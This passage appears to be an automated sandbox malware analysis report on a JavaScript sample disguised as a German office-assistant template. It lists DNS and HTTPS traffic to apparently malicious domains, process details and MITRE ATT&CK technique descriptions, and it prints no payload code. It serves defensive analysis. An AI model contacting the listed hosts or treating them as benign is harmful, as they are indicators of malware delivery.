Aug 21, 2021 17:39:17.582353115 CEST	8.8.8.8	192.168.2.6	0xc557	No error (0)	www.edmondoberselli.net		188.40.120.141	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 21, 2021 17:38:31.372118950 CEST	217.30.63.12	443	192.168.2.6	49689	CN=dischner-kartsport.de CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Jul 02 20:56:18 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Thu Sep 30 20:56:17 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024
Aug 21, 2021 17:38:54.392071962 CEST	74.124.194.166	443	192.168.2.6	49690	CN=ehiac.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon Jul 12 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Mon Oct 11 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Aug 21, 2021 17:39:17.641700029 CEST	188.40.120.141	443	192.168.2.6	49691	CN=www.edmondoberselli.net CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Aug 07 00:05:48 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Thu Nov 04 23:05:46 CET 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: wscript.exe PID: 4740 Parent PID: 3440

General

Start time:	17:35:32
Start date:	21/08/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js'
Imagebase:	0x7ff6c6b90000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: wscript.exe PID: 4740 Parent PID: 3440

General

Chronological Activities

Disassembly

Code Analysis